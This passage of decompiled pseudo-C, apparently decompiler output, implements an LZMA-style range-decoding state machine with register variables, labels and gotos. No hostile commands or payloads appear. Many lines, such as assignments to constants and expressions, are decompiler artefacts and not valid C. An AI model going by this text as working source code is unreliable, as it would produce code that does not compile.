                                                                                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                          											L139:
                                                                                                                          											_t537 =  *(_t644 - 0x84);
                                                                                                                          											L140:
                                                                                                                          											 *(_t644 - 0x88) = _t537;
                                                                                                                          											goto L1;
                                                                                                                          										case 6:
                                                                                                                          											L25:
                                                                                                                          											__edx = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L36:
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) = 1;
                                                                                                                          												 *(__ebp - 0x84) = 7;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											L26:
                                                                                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          											__esi =  *(__ebp - 0x60);
                                                                                                                          											__cl = 8;
                                                                                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          											__ecx =  *(__ebp - 0x3c);
                                                                                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											if( *(__ebp - 0x38) >= 4) {
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          													_t98 = __ebp - 0x38;
                                                                                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          													__eflags =  *_t98;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x38) = 0;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          											if( *(__ebp - 0x34) == __edx) {
                                                                                                                          												L35:
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												goto L61;
                                                                                                                          											} else {
                                                                                                                          												L32:
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 8);
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												goto L41;
                                                                                                                          											}
                                                                                                                          										case 7:
                                                                                                                          											L66:
                                                                                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          											if( *(__ebp - 0x40) != 1) {
                                                                                                                          												L68:
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          												 *(__ebp - 0x80) = 0x16;
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L69;
                                                                                                                          											}
                                                                                                                          											L67:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											__ecx =  *(__ebp - 0x38);
                                                                                                                          											 *(__ebp - 0x84) = 8;
                                                                                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 8:
                                                                                                                          											L70:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xa;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x38);
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          												 *(__ebp - 0x84) = 9;
                                                                                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          											}
                                                                                                                          											goto L132;
                                                                                                                          										case 9:
                                                                                                                          											L73:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												goto L90;
                                                                                                                          											}
                                                                                                                          											L74:
                                                                                                                          											__eflags =  *(__ebp - 0x60);
                                                                                                                          											if( *(__ebp - 0x60) == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											L75:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          											__eflags = _t259;
                                                                                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                          											goto L76;
                                                                                                                          										case 0xa:
                                                                                                                          											L82:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L84:
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xb;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											L83:
                                                                                                                          											__eax =  *(__ebp - 0x28);
                                                                                                                          											goto L89;
                                                                                                                          										case 0xb:
                                                                                                                          											L85:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x20);
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x28);
                                                                                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          											L89:
                                                                                                                          											__ecx =  *(__ebp - 0x2c);
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          											L90:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x80) = 0x15;
                                                                                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          											goto L69;
                                                                                                                          										case 0xc:
                                                                                                                          											L99:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L164:
                                                                                                                          												 *(__ebp - 0x88) = 0xc;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L100:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t334 = __ebp - 0x70;
                                                                                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t334;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											goto L101;
                                                                                                                          										case 0xd:
                                                                                                                          											L37:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L159:
                                                                                                                          												 *(__ebp - 0x88) = 0xd;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L38:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t122 = __ebp - 0x70;
                                                                                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t122;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L39:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          												goto L48;
                                                                                                                          											}
                                                                                                                          											L40:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												goto L54;
                                                                                                                          											}
                                                                                                                          											L41:
                                                                                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          											 *(__ebp - 0x48) = __eax;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__eax = __eax << 8;
                                                                                                                          											__eax = __eax + __ebx;
                                                                                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edx = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												 *(__ebp - 0x40) = 1;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__ebx = __ebx + __ebx + 1;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edx;
                                                                                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L39;
                                                                                                                          											} else {
                                                                                                                          												L45:
                                                                                                                          												goto L37;
                                                                                                                          											}
                                                                                                                          										case 0xe:
                                                                                                                          											L46:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L160:
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L47:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t156 = __ebp - 0x70;
                                                                                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t156;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											while(1) {
                                                                                                                          												L48:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L49:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t170 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t170;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													L53:
                                                                                                                          													goto L46;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L54:
                                                                                                                          											_t173 = __ebp - 0x34;
                                                                                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          											__eflags =  *_t173;
                                                                                                                          											goto L55;
                                                                                                                          										case 0xf:
                                                                                                                          											L58:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L161:
                                                                                                                          												 *(__ebp - 0x88) = 0xf;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L59:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t203 = __ebp - 0x70;
                                                                                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t203;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L60:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												L55:
                                                                                                                          												__al =  *(__ebp - 0x44);
                                                                                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          												goto L56;
                                                                                                                          											}
                                                                                                                          											L61:
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__edx = __ebx + __ebx;
                                                                                                                          											__ecx =  *(__ebp - 0x10);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												_t217 = __edx + 1; // 0x1
                                                                                                                          												__ebx = _t217;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edi;
                                                                                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L60;
                                                                                                                          											} else {
                                                                                                                          												L65:
                                                                                                                          												goto L58;
                                                                                                                          											}
                                                                                                                          										case 0x10:
                                                                                                                          											L109:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L165:
                                                                                                                          												 *(__ebp - 0x88) = 0x10;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L110:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t365 = __ebp - 0x70;
                                                                                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t365;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											goto L111;
                                                                                                                          										case 0x11:
                                                                                                                          											L69:
                                                                                                                          											__esi =  *(__ebp - 0x58);
                                                                                                                          											 *(__ebp - 0x84) = 0x12;
                                                                                                                          											goto L132;
                                                                                                                          										case 0x12:
                                                                                                                          											L128:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L131:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												 *(__ebp - 0x84) = 0x13;
                                                                                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          												L132:
                                                                                                                          												 *(_t644 - 0x54) = _t642;
                                                                                                                          												goto L133;
                                                                                                                          											}
                                                                                                                          											L129:
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											__eflags = __eax;
                                                                                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          											goto L130;
                                                                                                                          										case 0x13:
                                                                                                                          											L141:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L143:
                                                                                                                          												_t469 = __ebp - 0x58;
                                                                                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          												__eflags =  *_t469;
                                                                                                                          												 *(__ebp - 0x30) = 0x10;
                                                                                                                          												 *(__ebp - 0x40) = 8;
                                                                                                                          												L144:
                                                                                                                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                                                          												L145:
                                                                                                                          												 *(_t644 - 0x50) = 1;
                                                                                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                          												goto L149;
                                                                                                                          											}
                                                                                                                          											L142:
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											 *(__ebp - 0x30) = 8;
                                                                                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          											L130:
                                                                                                                          											 *(__ebp - 0x58) = __eax;
                                                                                                                          											 *(__ebp - 0x40) = 3;
                                                                                                                          											goto L144;
                                                                                                                          										case 0x14:
                                                                                                                          											L156:
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          											__eax =  *(__ebp - 0x80);
                                                                                                                          											while(1) {
                                                                                                                          												L140:
                                                                                                                          												 *(_t644 - 0x88) = _t537;
                                                                                                                          												goto L1;
                                                                                                                          											}
                                                                                                                          										case 0x15:
                                                                                                                          											L91:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          											__al = __al & 0x000000fd;
                                                                                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											goto L120;
                                                                                                                          										case 0x16:
                                                                                                                          											goto L0;
                                                                                                                          										case 0x17:
                                                                                                                          											while(1) {
                                                                                                                          												L145:
                                                                                                                          												 *(_t644 - 0x50) = 1;
                                                                                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                          												goto L149;
                                                                                                                          											}
                                                                                                                          										case 0x18:
                                                                                                                          											goto L146;
                                                                                                                          										case 0x19:
                                                                                                                          											L94:
                                                                                                                          											__eflags = __ebx - 4;
                                                                                                                          											if(__ebx < 4) {
                                                                                                                          												L98:
                                                                                                                          												 *(__ebp - 0x2c) = __ebx;
                                                                                                                          												L119:
                                                                                                                          												_t393 = __ebp - 0x2c;
                                                                                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          												__eflags =  *_t393;
                                                                                                                          												L120:
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax == 0) {
                                                                                                                          													L166:
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												L121:
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												L122:
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												_t400 = __ebp - 0x60;
                                                                                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          												__eflags =  *_t400;
                                                                                                                          												goto L123;
                                                                                                                          											}
                                                                                                                          											L95:
                                                                                                                          											__ecx = __ebx;
                                                                                                                          											__eax = __ebx;
                                                                                                                          											__ecx = __ebx >> 1;
                                                                                                                          											__eax = __ebx & 0x00000001;
                                                                                                                          											__ecx = (__ebx >> 1) - 1;
                                                                                                                          											__al = __al | 0x00000002;
                                                                                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          											__eflags = __ebx - 0xe;
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											if(__ebx >= 0xe) {
                                                                                                                          												L97:
                                                                                                                          												__ebx = 0;
                                                                                                                          												 *(__ebp - 0x48) = __ecx;
                                                                                                                          												L102:
                                                                                                                          												__eflags =  *(__ebp - 0x48);
                                                                                                                          												if( *(__ebp - 0x48) <= 0) {
                                                                                                                          													L107:
                                                                                                                          													__eax = __eax + __ebx;
                                                                                                                          													 *(__ebp - 0x40) = 4;
                                                                                                                          													 *(__ebp - 0x2c) = __eax;
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													L108:
                                                                                                                          													__ebx = 0;
                                                                                                                          													 *(__ebp - 0x58) = __eax;
                                                                                                                          													 *(__ebp - 0x50) = 1;
                                                                                                                          													 *(__ebp - 0x44) = 0;
                                                                                                                          													 *(__ebp - 0x48) = 0;
                                                                                                                          													L112:
                                                                                                                          													__eax =  *(__ebp - 0x40);
                                                                                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          														L118:
                                                                                                                          														_t391 = __ebp - 0x2c;
                                                                                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          														__eflags =  *_t391;
                                                                                                                          														goto L119;
                                                                                                                          													}
                                                                                                                          													L113:
                                                                                                                          													__eax =  *(__ebp - 0x50);
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          													__eax =  *(__ebp - 0x58);
